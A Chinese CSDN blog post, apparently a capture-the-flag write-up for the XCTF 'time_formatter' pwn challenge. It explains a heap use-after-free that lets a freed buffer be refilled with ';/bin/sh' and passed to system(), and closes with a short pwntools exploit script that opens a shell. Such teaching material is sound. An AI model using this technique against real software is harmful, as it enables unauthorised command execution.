堆UAF-攻防世界time_formatter

最新推荐文章于 2022-11-11 12:13:40 发布
最新推荐文章于 2022-11-11 12:13:40 发布
阅读量3.3k 收藏 1
点赞数
分类专栏: pwn题目 文章标签: pwn 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/121499692
版权

终于来到了传说中的堆,这是攻防世界里面的堆第一次,刚遇到的时候有点懵逼,看了wp也看不懂,后来才知道是堆题。。。

嗯,我回来了,哈哈哈哈,首先详细了分析了一波题目,先把重要的函数例举出来

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DTDhbGV4-1637663558086)(heap_1(攻防世界time_formatter).assets/image-20211123173241460.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-h6UsMhjE-1637663558088)(heap_1(攻防世界time_formatter).assets/image-20211123173518277.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lLk8ujyb-1637663558089)(heap_1(攻防世界time_formatter).assets/image-20211123173504967.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bLXtRYUX-1637663558091)(heap_1(攻防世界time_formatter).assets/image-20211123173538184.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jwjIoNLE-1637663558093)(heap_1(攻防世界time_formatter).assets/image-20211123173628629.png)]

纵观全局在我菜鸟看来就只有个system(“asdadasd;/bin/sh;as21sad12e”);这个漏洞,因为system的参数由我们控制,所以就有无限可能,这里有两个全局变量,第一个被格式化为整型了,另一个是字符串类型,那么就是构造";/bin/sh;"的最好容器,嗯,如图:可以看到ida列出来对ptr的操作只有3个

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YqbisJXG-1637663558094)(heap_1(攻防世界time_formatter).assets/image-20211123174049015.png)]

分别是一个malloc后的赋值、free释放和现在的system参数,但是呢通过malloc赋值那里有格式字符的限制输入不了";",然后再看程序总共可供我们输入的有分别是1、2、3这3个接收分别对应3个全局变量,前面说了dword_602120会直接变为整型用不了,那么就只有对value赋值这个函数有操作空间了。

通过学习malloc函数定义知识知道,malloc开辟内存后需要free释放并且对返回的指针置空,如果不释放会造成内存泄漏,指针不置空则会造成内存空间复用(glibc内存重新分配),因为这里没有在释放内存对指针进行初始化处理,就可以利用堆重新分配规则使我们输入的值指向上一个free chunk的地址

嗯,看demo

首先输入1开辟一块内存进行赋值操作然后输入AAAAAAAA,就可看到通过malloc(函数中strdup就是(strcpy + malloc)的结合)我们的chunk再看看它的数据

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-txGVSPIN-1637663558096)(heap_1(攻防世界time_formatter).assets/image-20211123180513995.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Keys8xgn-1637663558097)(heap_1(攻防世界time_formatter).assets/image-20211123180914398.png)]

然后再看看全局变量ptr的值

在这里插入图片描述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-H3DitIn1-1637663558099)(heap_1(攻防世界time_formatter).assets/image-20211123181015972.png)]

然后再对它进行释放,这样我们再申请同样大小的内存就会让这块chunk进行重新分配了

这里再选5、输入n保证程序不退出进行free chunk,此时的chunk数据为:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1dldJuQ1-1637663558102)(heap_1(攻防世界time_formatter).assets/image-20211123181539595.png)]

那么这时再通过malloc申请一样大小的内存、我们选择3、再输入我们的’;/bin/sh’再看看heap信息是否如期所致如图:可以看到之前free 的chunk已经被重新复用了,并且地址还是指向之前的位置,上面parseheap的status显示freed有点问题,时不时会这样显示不对,但看内存数据就可以了,因为没有fd和bk所以它是使用中的chunk

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Bflcs215-1637663558103)(heap_1(攻防世界time_formatter).assets/image-20211123181827620.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BZsjcAJO-1637663558105)(heap_1(攻防世界time_formatter).assets/image-20211123182021768.png)]

最后的exp:

sla = lambda delim, data: p.sendlineafter(delim, data)

sla('> ','1')
sla('Format: ','%s')
sla('> ','5')
sla('?','n')
sla('> ','3')
sla('Time zone: ',"\';/bin/sh\'")
sla('> ','4')
p.interactive()
HNHuangJingYu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 time_formatter
10-25 555
1 题目 2 分析 首先,找到漏洞点: 通过构造command,我们可以执行系统命令。所以对于ptr,我们希望他是这样的:';/bin/sh;' 这样我们就能通过system方法执行/bin/sh。于是,接下来的工作就是如何让ptr等于我们需要的值。 需要注意。ptr,也就是time format,他的输入时有字符检查的: 可以看到,我们的“;”不在允许范围内,所以通过输入直接构建ptr是不可能的。 这道题目的突破点其实就在退出函数这里: 可以看到,退出函...
攻防世界 Pwn time_formatter
MrTreebook的博客
03-06 370
攻防世界 Pwn time_formatter1.checksec分析2.IDA分析menu在 print_your_time 找到有关system函数控制好参数ptr即可拿到权限输入限制UAF利用思路3.exp 1.checksec分析 2.IDA分析 menu puts("Welcome to Mary's Unix Time Formatter!"); do { while ( 2 ) { puts("1) Set a time format.");
time_formatter [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列20
重新启程
12-25 827
题目地址:time_formatter 速度挺快的,已经赶上高手进阶区的第九题了! 废话不说,看看题目先 可以看到星星已经到了三颗星了。表示有点不一样的地方了。 照例看下安全机制 [*] '/ctf/work/python/time_formatter/807522d1647f4f0b8b26d6c1530d72b7' Arch: amd64-64-little ...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
fido-uaf-v1.0-ps-20171208-cn-pass.rar_IFAA_fido specification_中文
09-15
1.FIDO UAF 架构概览 v1.0.pdf 2.FIDO 术语表 v1.0.pdf 3.FIDO UAF 协议规范 v1.0.pdf 4.FIDO UAF 应用API和传输绑定规范 v1.0.pdf 5.FIDO UAF 认证器控制命令 v1.0.pdf 6.FIDO UAF 认证器特定模块API v1.0.pdf 7....
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
eID_fido-uaf-core
05-14
标题 "eID_fido-uaf-core" 暗示了这是一个与电子身份证(eID)相关的项目,它利用了FIDO UAF(Universal Authentication Framework)核心技术。FIDO UAF是一种安全的身份验证标准,旨在提供强认证,以保护用户免受...
uaf-for-incose
12-11
UAF is the next generation of the Unified Profile for DoDAF and MoDAF (UPDM) At one time referred to as UPDM 3 Longer Answer: An enterprise architecture framework Applicable for domains similar to ...
利用 UAF漏洞
m0_64195960的博客
05-16 673
buuctf上的easy_uaf漏洞
重启_uaf_hacknote
蚁景网安学院
10-14 354
亲爱的,关注我吧10/14文章共计2219个词预计阅读8分钟来和我一起阅读吧参考链接http://blog.eonew.cn/archives/490 https://blog.csd...
realloc函数UAF利用|攻防世界pwn进阶区supermarket
Kni9hT's Blog
03-21 870
文章目录思路0x00.tar解压0x01.查看保护0x02.查看程序并调试0x03.漏洞分析realloc函数详解0x04.利用思路利用过程exp编写 思路 0x00.tar解压 下载获得压缩包文件,解压之后放进ubuntu中发现还是一个tar格式压缩包。 tar -xf filename 附:linux下tar命令详解 解压得到一个libc.so.6的库和一个可执行文件 0x01.查看保护 ...
攻防世界pwn高手进阶区-time_formatter
CSDN_sunrise的博客
10-31 623
文章目录time_formatter伪代码main函数功能1--set_time_format功能2--set_time功能3--set_time_zone功能4--print_time功能5--free_and_exitpayload说明exp time_formatter 伪代码 main函数 循环输出菜单并根据输入跳转执行不同功能。 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __gid_t v3; // eax FI
time_formatter攻防世界学习
shanwei274的博客
04-12 323
time_formatter 前言:这题说实话分析量蛮大的,首先是程序内壁比较绕,而且调用了之前许多没有见到的函数—如snprintf_che,以及strsup(好像打错了),getegid(),并且对于一般的题目考察的方向是比较少的。 还是学了一些东西吧。 废话不多说,开始吧: 1.查看保护 保护极高了已经!!!就很恐惧!!! 2.运行收集信息 好家伙上来就报菜名嗷,更加恐惧了,不过有个提示嗷,一般报菜名的题目都是和有关的,至少我见的不多几道是这样。 3.ida查看 这里解释一些课外东西: 1.
溢出漏洞之UAF--(Use After Free)
半岛铁盒的博客
06-02 926
具体原理 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释放以后进行use。当我们重新申请与之前释放掉的内存大小相同的块时,就会就先问题. 可以继续使用之前释放掉的那块内存。但是再次使用时,因为指针指向的内存包含的数据不是原来的数据了,此时的引用对于正常程序来说是有风险的; 这是个UAF的错误例子 ...
攻防世界进阶题note_service2: 区第一题!
weixin_48066554的博客
03-16 335
note_service: 区第一题! 拿到题目,按惯例checksec: 发现开了PIE和Canary,这意味着我们不能愉快地ret2text了,有点难受,但是没开NX,那不就ret 2 system call 一把梭哈了吗 丢到ida里看一下(为方便阅读,已将部分函数名、变量名进行了更改): 反汇编 1、程序主体 void choice() { while ( 1 ) { menu(); printf("your choice>> "); switch (
python小记--攻防世界Time_losing解题脚本编写
tzyyyyyy的博客
11-11 355
python小记--攻防世界Time_losing解题脚本编写 利用脚本调用文件的时间戳和源时间戳进行相减计算 并转换为对应的ASCII码 得到flag
uaf-逻辑题-攻防世界 supermarket
csdn546229768的博客
11-30 372
刚开始我也被这题绕晕了,做这种题要画图画图!!!不然很容易做着做着忘了自己做到哪里来了 本题环境是ubuntu16、glib2.23!!!我第一次做的时候用的ubuntu18也就是glib2.27这时有tcache freechunk的分配策略不一样死活跑不出来,这题我还要研究一下tcache版本的。 首先申请了一个不在fastbin范围(0x10~0x58)的chunk0,然后再申请一个随便大小的chunk1,解释:因为下面我将要用remalloc重新分配chun0,remalloc如果重新分配的ch
TI-UAF42.pdf
最新发布
12-06
TI-UAF42是一款功能强大的通用型有源滤波器设计文档,它具有高度灵活性和易用性。这款设备的核心设计基于经典的模拟状态变量架构,包括一个反相放大器和两个集成的积分器,这使得它可以配置为低通、高通和带通滤波器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值